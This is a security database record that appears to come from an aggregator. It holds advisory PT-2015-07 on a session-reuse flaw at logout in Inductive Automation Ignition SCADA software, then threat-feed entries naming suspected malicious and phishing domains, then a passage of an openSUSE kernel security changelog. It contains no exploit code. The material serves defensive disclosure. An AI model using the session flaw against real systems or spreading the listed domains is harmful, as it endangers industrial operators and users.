ID PT-2015-07
Type ptsecurity
Reporter Positive Technologies
Modified 1970-01-01T00:00:00
Description
PT-2015-07: Privilege Gaining in Inductive Automation Ignition
Vulnerable software
Inductive Automation Ignition
Version: 7.7.3 and earlier
Link:
https://www.inductiveautomation.com/
Severity level
Severity level: Medium
Impact: Privilege Gaining
Access Vector: Remote
CVSS v2:
Base Score: 5.5
Vector: (AV:A/AC:H/Au:S/C:P/I:C/A:P)
CVE: not assigned
Software description
Inductive Automation Ignition is a cross-platform HMI, SCADA, and MES solution.
Vulnerability description
The specialists of the Positive Research center have detected a Privilege Gaining vulnerability in Inductive Automation Ignition.
After a user logs out, the session is not removed, which could allow an attacker to reuse the session with the privileges of that user.
How to fix
Update your software to the latest version.
Advisory status
12.02.2015 - Vendor gets vulnerability details
09.03.2015 - Vendor releases fixed version and details
11.03.2015 - Public disclosure
Credits
The vulnerability was detected by Evgeny Druzhinin, Positive Research Center (Positive Technologies Company)
References
http://en.securitylab.ru/lab/PT-2015-07
Reports on the vulnerabilities previously discovered by Positive Research:
<http://www.ptsecurity.com/research/advisory/>
<http://en.securitylab.ru/lab/>
{"id": "PT-2015-07", "lastseen": "2020-06-11T19:05:52", "viewCount": 33, "bulletinFamily": "info", "cvss": {}, "edition": 4, "ptsecurityAffected": [], "type": "ptsecurity", "description": "# PT-2015-07: Privilege Gaining in Inductive Automation Ignition\n\n## Vulnerable software\n\nInductive Automation Ignition \nVersion: 7.7.3 and earlier\n\nLink: \n[https://www.inductiveautomation.com/](<https://www.inductiveautomation.com/scada-software/>)\n\n## Severity level\n\nSeverity level: Medium \nImpact: Privilege Gaining \nAccess Vector: Remote \n\n\nCVSS v2: \nBase Score: 5.5 \nVector: (AV:A/AC:H/Au:S/C:P/I:C/A:P)\n\nCVE: not assigned\n\n## Software description\n\nInductive Automation Ignition is a cross-platform HMI, SCADA, and MES solution.\n\n## Vulnerability description\n\nThe specialists of the Positive Research center have detected a Privilege Gaining vulnerability in Inductive Automation Ignition.\n\nAfter user\u2019s logout session is not removed which could lead to session reuse by attacker with privileges of the same user.\n\n## How to fix\n\nUpdate your sofware up to the latest version\n\n## Advisory status\n\n12.02.2015 - Vendor gets vulnerability details \n09.03.2015 - Vendor releases fixed version and details \n11.03.2015 - Public disclosure\n\n## Credits\n\nThe vulnerability was detected by Evgeny Druzhinin, Positive Research Center (Positive Technologies Company)\n\n## References\n\n[ http://en.securitylab.ru/lab/PT-2015-07](<http://en.securitylab.ru/lab/PT-2015-07>) \n\n\nReports on the vulnerabilities previously discovered by Positive Research:\n\n<http://www.ptsecurity.com/research/advisory/> \n<http://en.securitylab.ru/lab/>\n", "title": "PT-2015-07: Privilege Gaining in Inductive Automation Ignition", "cvelist": [], "published": "2015-11-03T00:00:00", "references": ["http://en.securitylab.ru/lab/PT-2015-07"], "reporter": "Positive Technologies", "modified": "1970-01-01T00:00:00", "href": 
"https://www.ptsecurity.com/ww-en/analytics/threatscape/pt-2015-07/", "enchantments": {"dependencies": {"references": [{"type": "mskb", "idList": ["KB4011200"]}, {"type": "nessus", "idList": ["OPENSUSE-2019-140.NASL", "OPENSUSE-2016-273.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-25439", "1337DAY-ID-25204", "1337DAY-ID-31673"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:138083", "PACKETSTORM:136859", "PACKETSTORM:150433", "PACKETSTORM:141523", "PACKETSTORM:137941"]}, {"type": "seebug", "idList": ["SSV:92748"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:154217C4E22F7E69A2A1ADE7137284FF", "EXPLOITPACK:ACB669AF665DBE40385085A8FAAD529D", "EXPLOITPACK:10FC054F61AB23DF9EBD8B76BA25CF3B"]}, {"type": "exploitdb", "idList": ["EDB-ID:39745", "EDB-ID:40125"]}, {"type": "thn", "idList": ["THN:DE5B6507B89A4E6D0FE70CB0B87426D4"]}, {"type": "ciscothreats", "idList": ["CISCO-THREAT-43959"]}, {"type": "openvas", "idList": ["OPENVAS:703457"]}], "modified": "2020-06-11T19:05:52", "rev": 2}, "score": {"value": 4.0, "vector": "NONE", "modified": "2020-06-11T19:05:52", "rev": 2}, "vulnersScore": 4.0}, "scheme": null}
{"rst": [{"lastseen": "2021-01-25T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **beborneo[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **22**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-25T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 108[.]179.233.1\nWhois:\n Created: 2015-12-28 07:03:41, \n Registrar: PT ARDH GLOBAL INDONESIA, \n Registrant: unknown.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:05548276-045A-3082-A6B5-B6DD8045C614", "href": "", "published": "2021-01-26T00:00:00", "title": "RST Threat feed. IOC: beborneo.com", "type": "rst", "cvss": {}}, {"lastseen": "2020-09-06T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **bagir[.]pt/shp/sharepoint-md7** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-07-19T03:00:00, Last seen: 2020-09-06T03:00:00.\n IOC tags: **phishing**.\nIt was found that the IOC is used by: **cve-2018-19396, cve-2019-9023, cve-2015-8994, cve-2013-4635, cve-2011-0755, cve-2017-16642, cve-2012-0788, cve-2016-7478, cve-2019-6977, cve-2012-0789, cve-2010-3870, cve-2011-1470, cve-2011-0421, cve-2010-5107, cve-2011-1464, cve-2013-1635, cve-2017-15906, cve-2011-4327, cve-2012-1172, cve-2011-1092, cve-2014-1692, cve-2018-15132, cve-2012-1823, cve-2012-3365, cve-2018-10546, cve-2018-10547, cve-2019-9638, cve-2019-9639, cve-2011-4885, cve-2012-2376, cve-2014-2497, cve-2018-19935, cve-2011-0708, cve-2018-14883, cve-2010-4699, cve-2016-10708, cve-2018-10548, cve-2012-0057, cve-2018-10549, cve-2019-9637, cve-2013-4248, cve-2014-0238, cve-2011-5000, cve-2018-17082, cve-2011-1469, cve-2011-1468, cve-2012-0814, cve-2014-9427, cve-2012-2386, cve-2014-0237, cve-2018-10545, cve-2010-4755, cve-2011-1466, cve-2011-1467, cve-2012-2311, cve-2012-2336, cve-2012-1171, cve-2016-0777, cve-2019-9641, cve-2018-20783, cve-2018-19520, cve-2012-2688, 
cve-2013-2110, cve-2013-1643, cve-2012-2143, cve-2019-9024, cve-2014-5459, cve-2011-4718, cve-2018-19395, cve-2019-9020, cve-2019-9021, cve-2006-7243, cve-2010-4478**.\nIOC could be a **False Positive** (Resource unavailable).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-07-19T00:00:00", "id": "RST:2EE54CF9-879E-3D80-B1F7-3D6D0191C682", "href": "", "published": "2020-09-09T00:00:00", "title": "RST Threat feed. IOC: bagir.pt/shp/sharepoint-md7", "type": "rst", "cvss": {}}], "nessus": [{"lastseen": "2021-01-20T12:41:46", "description": "The openSUSE Leap 42.3 Linux kernel was updated to 4.4.172 to receive\nvarious security and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2019-3459,CVE-2019-3460: Two remote information leak\n vulnerabilities in the Bluetooth stack were fixed that\n could potentially leak kernel information (bsc#1120758)\n\n - CVE-2018-19407: The vcpu_scan_ioapic function in\n arch/x86/kvm/x86.c allowed local users to cause a denial\n of service (NULL pointer dereference and BUG) via\n crafted system calls that reach a situation where ioapic\n is uninitialized (bnc#1116841).\n\n - CVE-2018-19985: The function hso_probe read if_num from\n the USB device (as an u8) and used it without a length\n check to index an array, resulting in an OOB memory read\n in hso_probe or hso _get_config_data that could be used\n by local attackers (bnc#1120743).\n\n - CVE-2018-1120: By mmap()ing a FUSE-backed file onto a\n process's memory containing command line arguments (or\n environment strings), an attacker can cause utilities\n from psutils or procps (such as ps, w) or any other\n program which made a read() call to the\n /proc/<pid>/cmdline (or /proc/<pid>/environ) files to\n block indefinitely (denial of service) or for some\n controlled time (as a synchronization primitive for\n other attacks) (bnc#1087082).\n\n - CVE-2018-16884: NFS41+ shares mounted in different\n network namespaces at the same time can 
make\n bc_svc_process() use wrong back-channel IDs and cause a\n use-after-free vulnerability. Thus a malicious container\n user can cause a host kernel memory corruption and a\n system panic. Due to the nature of the flaw, privilege\n escalation cannot be fully ruled out (bnc#1119946).\n\n - CVE-2018-20169: The USB subsystem mishandled size checks\n during the reading of an extra descriptor, related to\n __usb_get_extra_descriptor in drivers/usb/core/usb.c\n (bnc#1119714).\n\n - CVE-2018-9568: In sk_clone_lock of sock.c, there is a\n possible memory corruption due to type confusion. This\n could lead to local escalation of privilege with no\n additional execution privileges needed. User interaction\n is not needed for exploitation. (bnc#1118319).\n\n - CVE-2018-16862: A security flaw was found in a way that\n the cleancache subsystem clears an inode after the final\n file truncation (removal). The new file created with the\n same inode may contain leftover pages from cleancache\n and the old file data instead of the new one\n (bnc#1117186).\n\n - CVE-2018-19824: A local user could exploit a\n use-after-free in the ALSA driver by supplying a\n malicious USB Sound device (with zero interfaces) that\n is mishandled in usb_audio_probe in sound/usb/card.c\n (bnc#1118152).\n\nThe following non-security bugs were fixed :\n\n - 9p/net: put a lower bound on msize (bnc#1012382).\n\n - ACPI/IORT: Fix iort_get_platform_device_domain()\n uninitialized pointer value (bsc#1121239).\n\n - acpi/nfit: Block function zero DSMs (bsc#1123321).\n\n - acpi/nfit: Fix command-supported detection\n (bsc#1123323).\n\n - acpi/nfit, x86/mce: Handle only uncorrectable machine\n checks (bsc#1114648).\n\n - acpi/nfit, x86/mce: Validate a MCE's address before\n using it (bsc#1114648).\n\n - acpi/power: Skip duplicate power resource references in\n _PRx (bnc#1012382).\n\n - acpi/processor: Fix the return value of\n acpi_processor_ids_walk() (git fixes (acpi)).\n\n - aio: fix spectre gadget in 
lookup_ioctx (bnc#1012382).\n\n - aio: hold an extra file reference over AIO read/write\n operations (bsc#1116027).\n\n - alsa: ac97: Fix incorrect bit shift at AC97-SPSA control\n write (bnc#1012382).\n\n - alsa: bebob: fix model-id of unit for Apogee Ensemble\n (bnc#1012382).\n\n - alsa: control: Fix race between adding and removing a\n user element (bnc#1012382).\n\n - alsa: cs46xx: Potential NULL dereference in probe\n (bnc#1012382).\n\n - alsa: emu10k1: Fix potential Spectre v1 vulnerabilities\n (bnc#1012382).\n\n - alsa: emux: Fix potential Spectre v1 vulnerabilities\n (bnc#1012382).\n\n - alsa: hda: add mute LED support for HP EliteBook 840 G4\n (bnc#1012382).\n\n - alsa: hda: Add support for AMD Stoney Ridge\n (bnc#1012382).\n\n - alsa: hda/realtek - Disable headset Mic VREF for headset\n mode of ALC225 (bnc#1012382).\n\n - alsa: hda/tegra: clear pending irq handlers\n (bnc#1012382).\n\n - alsa: isa/wavefront: prevent some out of bound writes\n (bnc#1012382).\n\n - alsa: pcm: Call snd_pcm_unlink() conditionally at\n closing (bnc#1012382).\n\n - alsa: pcm: Fix interval evaluation with openmin/max\n (bnc#1012382).\n\n - alsa: pcm: Fix potential Spectre v1 vulnerability\n (bnc#1012382).\n\n - alsa: pcm: Fix starvation on down_write_nonblock()\n (bnc#1012382).\n\n - alsa: pcm: remove SNDRV_PCM_IOCTL1_INFO internal command\n (bnc#1012382).\n\n - alsa: rme9652: Fix potential Spectre v1 vulnerability\n (bnc#1012382).\n\n - alsa: sparc: Fix invalid snd_free_pages() at error path\n (bnc#1012382).\n\n - alsa: trident: Suppress gcc string warning\n (bnc#1012382).\n\n - alsa: usb-audio: Avoid access before bLength check in\n build_audio_procunit() (bnc#1012382).\n\n - alsa: usb-audio: Fix an out-of-bound read in\n create_composite_quirks (bnc#1012382).\n\n - alsa: wss: Fix invalid snd_free_pages() at error path\n (bnc#1012382).\n\n - arc: change defconfig defaults to ARCv2 (bnc#1012382).\n\n - arc: [devboards] Add support of NFSv3 ACL (bnc#1012382).\n\n - arc: io.h: 
Implement reads(x)()/writes(x)()\n (bnc#1012382).\n\n - arm64: Do not trap host pointer auth use to EL2\n (bnc#1012382).\n\n - arm64/kvm: consistently handle host HCR_EL2 flags\n (bnc#1012382).\n\n - arm64: perf: set suppress_bind_attrs flag to true\n (bnc#1012382).\n\n - arm64: remove no-op -p linker flag (bnc#1012382).\n\n - arm: 8814/1: mm: improve/fix ARM v7_dma_inv_range()\n unaligned address handling (bnc#1012382).\n\n - arm: imx: update the cpu power up timing setting on\n i.mx6sx (bnc#1012382).\n\n - arm: kvm: fix building with gcc-8 (bsc#1121241).\n\n - arm: OMAP1: ams-delta: Fix possible use of uninitialized\n field (bnc#1012382).\n\n - arm: OMAP2+: prm44xx: Fix section annotation on\n omap44xx_prm_enable_io_wakeup (bnc#1012382).\n\n - ASoC: dapm: Recalculate audio map forcely when card\n instantiated (bnc#1012382).\n\n - ASoC: omap-dmic: Add pm_qos handling to avoid overruns\n with CPU_IDLE (bnc#1012382).\n\n - ASoC: omap-mcpdm: Add pm_qos handling to avoid\n under/overruns with CPU_IDLE (bnc#1012382).\n\n - ata: Fix racy link clearance (bsc#1107866).\n\n - ath10k: fix kernel panic due to race in accessing arvif\n list (bnc#1012382).\n\n - ax25: fix a use-after-free in ax25_fillin_cb()\n (bnc#1012382).\n\n - b43: Fix error in cordic routine (bnc#1012382).\n\n - batman-adv: Expand merged fragment buffer for full\n packet (bnc#1012382).\n\n - bfs: add sanity check at bfs_fill_super() (bnc#1012382).\n\n - block/loop: Use global lock for ioctl() operation\n (bnc#1012382).\n\n - block/swim3: Fix -EBUSY error when re-opening device\n after unmount (Git-fixes).\n\n - bnx2x: Assign unique DMAE channel number for FW DMAE\n transactions (bnc#1012382).\n\n - bonding: fix 802.3ad state sent to partner when\n unbinding slave (bnc#1012382).\n\n - bpf: fix check of allowed specifiers in bpf_trace_printk\n (bnc#1012382).\n\n - bpf: support 8-byte metafield access (bnc#1012382).\n\n - bpf, trace: check event type in bpf_perf_event_read\n (bsc#1119970).\n\n - bpf, trace: 
use READ_ONCE for retrieving file ptr\n (bsc#1119967).\n\n - bpf/verifier: Add spi variable to check_stack_write()\n (bnc#1012382).\n\n - bpf/verifier: Pass instruction index to\n check_mem_access() and check_xadd() (bnc#1012382).\n\n - btrfs: Always try all copies when reading extent buffers\n (bnc#1012382).\n\n - btrfs: ensure path name is null terminated at\n btrfs_control_ioctl (bnc#1012382).\n\n - btrfs: Fix memory barriers usage with device stats\n counters (git-fixes).\n\n - btrfs: fix use-after-free when dumping free space\n (bnc#1012382).\n\n - btrfs: Handle error from btrfs_uuid_tree_rem call in\n _btrfs_ioctl_set_received_subvol (git-fixes).\n\n - btrfs: release metadata before running delayed refs\n (bnc#1012382).\n\n - btrfs: send, fix infinite loop due to directory rename\n dependencies (bnc#1012382).\n\n - btrfs: tree-checker: Check level for leaves and nodes\n (bnc#1012382).\n\n - btrfs: tree-checker: Do not check max block group size\n as current max chunk size limit is unreliable (fixes for\n bnc#1012382 bsc#1102875 bsc#1102877 bsc#1102879\n bsc#1102882 bsc#1102896).\n\n - btrfs: tree-checker: Fix misleading group system\n information (bnc#1012382).\n\n - btrfs: tree-check: reduce stack consumption in\n check_dir_item (bnc#1012382).\n\n - btrfs: validate type when reading a chunk (bnc#1012382).\n\n - btrfs: wait on ordered extents on abort cleanup\n (bnc#1012382).\n\n - can: dev: __can_get_echo_skb(): Do not crash the kernel\n if can_priv::echo_skb is accessed out of bounds\n (bnc#1012382).\n\n - can: dev: can_get_echo_skb(): factor out non sending\n code to __can_get_echo_skb() (bnc#1012382).\n\n - can: dev: __can_get_echo_skb(): print error message, if\n trying to echo non existing skb (bnc#1012382).\n\n - can: dev: __can_get_echo_skb(): replace struct can_frame\n by canfd_frame to access frame length (bnc#1012382).\n\n - can: gw: ensure DLC boundaries after CAN frame\n modification (bnc#1012382).\n\n - can: rcar_can: Fix erroneous registration 
(bnc#1012382).\n\n - cdc-acm: fix abnormal DATA RX issue for Mediatek\n Preloader (bnc#1012382).\n\n - ceph: do not update importing cap's mseq when handing\n cap export (bsc#1121275).\n\n - checkstack.pl: fix for aarch64 (bnc#1012382).\n\n - cifs: Do not hide EINTR after sending network packets\n (bnc#1012382).\n\n - cifs: Fix error mapping for SMB2_LOCK command which\n caused OFD lock problem (bnc#1012382).\n\n - cifs: Fix potential OOB access of lock element array\n (bnc#1012382).\n\n - cifs: Fix separator when building path from dentry\n (bnc#1012382).\n\n - cifs: In Kconfig CONFIG_CIFS_POSIX needs depends on\n legacy (insecure cifs) (bnc#1012382).\n\n - clk: imx6q: reset exclusive gates on init (bnc#1012382).\n\n - clk: mmp: Off by one in mmp_clk_add() (bnc#1012382).\n\n - cpufeature: avoid warning when compiling with clang\n (Git-fixes).\n\n - cpufreq: imx6q: add return value check for voltage scale\n (bnc#1012382).\n\n - crypto: authencesn - Avoid twice completion call in\n decrypt path (bnc#1012382).\n\n - crypto: authenc - fix parsing key with misaligned\n rta_len (bnc#1012382).\n\n - crypto: cts - fix crash on short inputs (bnc#1012382).\n\n - crypto: user - support incremental algorithm dumps\n (bsc#1120902).\n\n - crypto: x86/chacha20 - avoid sleeping with preemption\n disabled (bnc#1012382).\n\n - cw1200: Do not leak memory if krealloc failes\n (bnc#1012382).\n\n - debugobjects: avoid recursive calls with kmemleak\n (bnc#1012382).\n\n - Disable MSI also when pcie-octeon.pcie_disable on\n (bnc#1012382).\n\n - disable stringop truncation warnings for now\n (bnc#1012382).\n\n - dlm: fixed memory leaks after failed ls_remove_names\n allocation (bnc#1012382).\n\n - dlm: lost put_lkb on error path in receive_convert() and\n receive_unlock() (bnc#1012382).\n\n - dlm: memory leaks on error path in dlm_user_request()\n (bnc#1012382).\n\n - dlm: possible memory leak on error path in create_lkb()\n (bnc#1012382).\n\n - dmaengine: at_hdmac: fix memory leak in 
at_dma_xlate()\n (bnc#1012382).\n\n - dmaengine: at_hdmac: fix module unloading (bnc#1012382).\n\n - dm cache metadata: ignore hints array being too small\n during resize (Git-fixes).\n\n - dm crypt: add cryptographic data integrity protection\n (authenticated encryption) (Git-fixes).\n\n - dm crypt: factor IV constructor out to separate function\n (Git-fixes).\n\n - dm crypt: fix crash by adding missing check for auth key\n size (git-fixes).\n\n - dm crypt: fix error return code in crypt_ctr()\n (git-fixes).\n\n - dm crypt: fix memory leak in crypt_ctr_cipher_old()\n (git-fixes).\n\n - dm crypt: introduce new format of cipher with 'capi:'\n prefix (Git-fixes).\n\n - dm crypt: wipe kernel key copy after IV initialization\n (Git-fixes).\n\n - dm: do not allow readahead to limit IO size (git fixes\n (readahead)).\n\n - dm kcopyd: Fix bug causing workqueue stalls\n (bnc#1012382).\n\n - dm-multipath: do not assign cmd_flags in setup_clone()\n (bsc#1103156).\n\n - dm snapshot: Fix excessive memory usage and workqueue\n stalls (bnc#1012382).\n\n - dm thin: stop no_space_timeout worker when switching to\n write-mode (Git-fixes).\n\n - drivers: hv: vmbus: check the creation_status in\n vmbus_establish_gpadl() (bsc#1104098).\n\n - drivers: hv: vmbus: Return -EINVAL for the sys files for\n unopened channels (bnc#1012382).\n\n - drivers/sbus/char: add of_node_put() (bnc#1012382).\n\n - drivers/tty: add missing of_node_put() (bnc#1012382).\n\n - drm/ast: change resolution may cause screen blurred\n (bnc#1012382).\n\n - drm/ast: fixed cursor may disappear sometimes\n (bnc#1012382).\n\n - drm/ast: fixed reading monitor EDID not stable issue\n (bnc#1012382).\n\n - drm/ast: Fix incorrect free on ioregs (bsc#1106929)\n\n - drm/fb-helper: Ignore the value of\n fb_var_screeninfo.pixclock (bsc#1106929)\n\n - drm/ioctl: Fix Spectre v1 vulnerabilities (bnc#1012382).\n\n - drm/msm: Grab a vblank reference when waiting for\n commit_done (bnc#1012382).\n\n - drm: rcar-du: Fix external 
clock error checks\n (bsc#1106929)\n\n - drm: rcar-du: Fix vblank initialization (bsc#1106929)\n\n - e1000e: allow non-monotonic SYSTIM readings\n (bnc#1012382).\n\n - EDAC: Raise the maximum number of memory controllers\n (bsc#1120722).\n\n - efi/libstub/arm64: Use hidden attribute for struct\n screen_info reference (bsc#1122650).\n\n - exec: avoid gcc-8 warning for get_task_comm\n (bnc#1012382).\n\n - exportfs: do not read dentry after free (bnc#1012382).\n\n - ext2: fix potential use after free (bnc#1012382).\n\n - ext4: fix a potential fiemap/page fault deadlock w/\n inline_data (bnc#1012382).\n\n - ext4: Fix crash during online resizing (bsc#1122779).\n\n - ext4: fix EXT4_IOC_GROUP_ADD ioctl (bnc#1012382).\n\n - ext4: fix possible use after free in ext4_quota_enable\n (bnc#1012382).\n\n - ext4: force inode writes when nfsd calls\n commit_metadata() (bnc#1012382).\n\n - ext4: missing unlock/put_page() in\n ext4_try_to_write_inline_data() (bnc#1012382).\n\n - f2fs: Add sanity_check_inode() function (bnc#1012382).\n\n - f2fs: avoid unneeded loop in build_sit_entries\n (bnc#1012382).\n\n - f2fs: check blkaddr more accuratly before issue a bio\n (bnc#1012382).\n\n - f2fs: clean up argument of recover_data (bnc#1012382).\n\n - f2fs: clean up with is_valid_blkaddr() (bnc#1012382).\n\n - f2fs: detect wrong layout (bnc#1012382).\n\n - f2fs: enhance sanity_check_raw_super() to avoid\n potential overflow (bnc#1012382).\n\n - f2fs: factor out fsync inode entry operations\n (bnc#1012382).\n\n - f2fs: fix inode cache leak (bnc#1012382).\n\n - f2fs: fix invalid memory access (bnc#1012382).\n\n - f2fs: fix missing up_read (bnc#1012382).\n\n - f2fs: fix to avoid reading out encrypted data in page\n cache (bnc#1012382).\n\n - f2fs: fix to convert inline directory correctly\n (bnc#1012382).\n\n - f2fs: fix to determine start_cp_addr by sbi->cur_cp_pack\n (bnc#1012382).\n\n - f2fs: fix to do sanity check with block address in main\n area (bnc#1012382).\n\n - f2fs: fix to do 
sanity check with block address in main\n area v2 (bnc#1012382).\n\n - f2fs: fix to do sanity check with cp_pack_start_sum\n (bnc#1012382).\n\n - f2fs: fix to do sanity check with node footer and\n iblocks (bnc#1012382).\n\n - f2fs: fix to do sanity check with reserved blkaddr of\n inline inode (bnc#1012382).\n\n - f2fs: fix to do sanity check with secs_per_zone\n (bnc#1012382).\n\n - f2fs: fix to do sanity check with user_block_count\n (bnc#1012382).\n\n - f2fs: fix validation of the block count in\n sanity_check_raw_super (bnc#1012382).\n\n - f2fs: free meta pages if sanity check for ckpt is failed\n (bnc#1012382).\n\n - f2fs: give -EINVAL for norecovery and rw mount\n (bnc#1012382).\n\n - f2fs: introduce and spread verify_blkaddr (bnc#1012382).\n\n - f2fs: introduce get_checkpoint_version for cleanup\n (bnc#1012382).\n\n - f2fs: move sanity checking of cp into\n get_valid_checkpoint (bnc#1012382).\n\n - f2fs: not allow to write illegal blkaddr (bnc#1012382).\n\n - f2fs: put directory inodes before checkpoint in\n roll-forward recovery (bnc#1012382).\n\n - f2fs: remove an obsolete variable (bnc#1012382).\n\n - f2fs: return error during fill_super (bnc#1012382).\n\n - f2fs: sanity check on sit entry (bnc#1012382).\n\n - f2fs: use crc and cp version to determine roll-forward\n recovery (bnc#1012382).\n\n - fbdev: fbcon: Fix unregister crash when more than one\n framebuffer (bsc#1106929)\n\n - fbdev: fbmem: behave better with small rotated displays\n and many CPUs (bsc#1106929)\n\n - fix fragmentation series\n\n - Fix problem with sharetransport= and NFSv4\n (bsc#1114893).\n\n - floppy: fix race condition in __floppy_read_block_0()\n (Git-fixes).\n\n - fork: record start_time late (bnc#1012382).\n\n - fscache, cachefiles: remove redundant variable 'cache'\n (bnc#1012382).\n\n - fscache: Fix race in fscache_op_complete() due to split\n atomic_sub & read (Git-fixes).\n\n - fscache: Pass the correct cancelled indications to\n fscache_op_complete() (Git-fixes).\n\n - 
genwqe: Fix size check (bnc#1012382).\n\n - gfs2: Do not leave s_fs_info pointing to freed memory in\n init_sbd (bnc#1012382).\n\n - gfs2: Fix loop in gfs2_rbm_find (bnc#1012382).\n\n - git_sort.py: Remove non-existent remote tj/libata\n\n - gpiolib: Fix return value of gpio_to_desc() stub if\n !GPIOLIB (Git-fixes).\n\n - gpio: max7301: fix driver for use with CONFIG_VMAP_STACK\n (bnc#1012382).\n\n - gro_cell: add napi_disable in gro_cells_destroy\n (bnc#1012382).\n\n - hfs: do not free node before using (bnc#1012382).\n\n - hfsplus: do not free node before using (bnc#1012382).\n\n - hpwdt add dynamic debugging (bsc#1114417).\n\n - hpwdt calculate reload value on each use (bsc#1114417).\n\n - hugetlbfs: fix bug in pgoff overflow checking\n (bnc#1012382).\n\n - hwmon: (ina2xx) Fix current value calculation\n (bnc#1012382).\n\n - hwmon: (w83795) temp4_type has writable permission\n (bnc#1012382).\n\n - hwpoison, memory_hotplug: allow hwpoisoned pages to be\n offlined (bnc#1116336).\n\n - i2c: axxia: properly handle master timeout\n (bnc#1012382).\n\n - i2c: dev: prevent adapter retries and timeout being set\n as minus value (bnc#1012382).\n\n - i2c: scmi: Fix probe error on devices with an empty\n SMB0001 ACPI device node (bnc#1012382).\n\n - ib/hfi1: Fix an out-of-bounds access in get_hw_stats ().\n\n - ibmveth: Do not process frames after calling\n napi_reschedule (bcs#1123357).\n\n - ibmveth: fix DMA unmap error in ibmveth_xmit_start error\n path (bnc#1012382).\n\n - ibmvnic: Add ethtool private flag for driver-defined\n queue limits (bsc#1121726).\n\n - ibmvnic: Convert reset work item mutex to spin lock ().\n\n - ibmvnic: Fix non-atomic memory allocation in IRQ context\n ().\n\n - ibmvnic: Increase maximum queue size limit\n (bsc#1121726).\n\n - ibmvnic: Introduce driver limits for ring sizes\n (bsc#1121726).\n\n - ide: pmac: add of_node_put() (bnc#1012382).\n\n - ieee802154: lowpan_header_create check must check daddr\n (bnc#1012382).\n\n - input: elan_i2c - 
add ACPI ID for Lenovo IdeaPad\n 330-15ARR (bnc#1012382).\n\n - input: elan_i2c - add ACPI ID for touchpad in ASUS\n Aspire F5-573G (bnc#1012382).\n\n - input: elan_i2c - add ELAN0620 to the ACPI table\n (bnc#1012382).\n\n - input: elan_i2c - add support for ELAN0621 touchpad\n (bnc#1012382).\n\n - input: matrix_keypad - check for errors from\n of_get_named_gpio() (bnc#1012382).\n\n - input: omap-keypad - fix idle configuration to not block\n SoC idle states (bnc#1012382).\n\n - input: omap-keypad - fix keyboard debounce configuration\n (bnc#1012382).\n\n - input: restore EV_ABS ABS_RESERVED (bnc#1012382).\n\n - input: xpad - add GPD Win 2 Controller USB IDs\n (bnc#1012382).\n\n - input: xpad - add Mad Catz FightStick TE 2 VID/PID\n (bnc#1012382).\n\n - input: xpad - add more third-party controllers\n (bnc#1012382).\n\n - input: xpad - add PDP device id 0x02a4 (bnc#1012382).\n\n - input: xpad - add product ID for Xbox One S pad\n (bnc#1012382).\n\n - input: xpad - add support for PDP Xbox One controllers\n (bnc#1012382).\n\n - input: xpad - add support for Xbox1 PDP Camo series\n gamepad (bnc#1012382).\n\n - input: xpad - add USB IDs for Mad Catz Brawlstick and\n Razer Sabertooth (bnc#1012382).\n\n - input: xpad - avoid using __set_bit() for capabilities\n (bnc#1012382).\n\n - input: xpad - constify usb_device_id (bnc#1012382).\n\n - input: xpad - correctly sort vendor id's (bnc#1012382).\n\n - input: xpad - correct xbox one pad device name\n (bnc#1012382).\n\n - input: xpad - do not depend on endpoint order\n (bnc#1012382).\n\n - input: xpad - fix GPD Win 2 controller name\n (bnc#1012382).\n\n - input: xpad - fix PowerA init quirk for some gamepad\n models (bnc#1012382).\n\n - input: xpad - fix rumble on Xbox One controllers with\n 2015 firmware (bnc#1012382).\n\n - input: xpad - fix some coding style issues\n (bnc#1012382).\n\n - input: xpad - fix stuck mode button on Xbox One S pad\n (bnc#1012382).\n\n - input: xpad - fix Xbox One rumble stopping after 2.5\n 
secs (bnc#1012382).\n\n - input: xpad - handle 'present' and 'gone' correctly\n (bnc#1012382).\n\n - input: xpad - move reporting xbox one home button to\n common function (bnc#1012382).\n\n - input: xpad - power off wireless 360 controllers on\n suspend (bnc#1012382).\n\n - input: xpad - prevent spurious input from wired Xbox 360\n controllers (bnc#1012382).\n\n - input: xpad - quirk all PDP Xbox One gamepads\n (bnc#1012382).\n\n - input: xpad - remove spurious events of wireless xpad\n 360 controller (bnc#1012382).\n\n - input: xpad - remove unused function (bnc#1012382).\n\n - input: xpad - restore LED state after device resume\n (bnc#1012382).\n\n - input: xpad - simplify error condition in init_output\n (bnc#1012382).\n\n - input: xpad - sort supported devices by USB ID\n (bnc#1012382).\n\n - input: xpad - support some quirky Xbox One pads\n (bnc#1012382).\n\n - input: xpad - sync supported devices with 360Controller\n (bnc#1012382).\n\n - input: xpad - sync supported devices with XBCD\n (bnc#1012382).\n\n - input: xpad - sync supported devices with xboxdrv\n (bnc#1012382).\n\n - input: xpad - update Xbox One Force Feedback Support\n (bnc#1012382).\n\n - input: xpad - use LED API when identifying wireless\n controllers (bnc#1012382).\n\n - input: xpad - validate USB endpoint type during probe\n (bnc#1012382).\n\n - input: xpad - workaround dead irq_out after suspend/\n resume (bnc#1012382).\n\n - input: xpad - xbox one elite controller support\n (bnc#1012382).\n\n - intel_th: msu: Fix an off-by-one in attribute store\n (bnc#1012382).\n\n - iommu/amd: Call free_iova_fast with pfn in map_sg\n (bsc#1106105).\n\n - iommu/amd: Fix amd_iommu=force_isolation (bsc#1106105).\n\n - iommu/amd: Fix IOMMU page flush when detach device from\n a domain (bsc#1106105).\n\n - iommu/amd: Unmap all mapped pages in error path of\n map_sg (bsc#1106105).\n\n - iommu/vt-d: Fix memory leak in\n intel_iommu_put_resv_regions() (bsc#1106105).\n\n - iommu/vt-d: Handle domain agaw being 
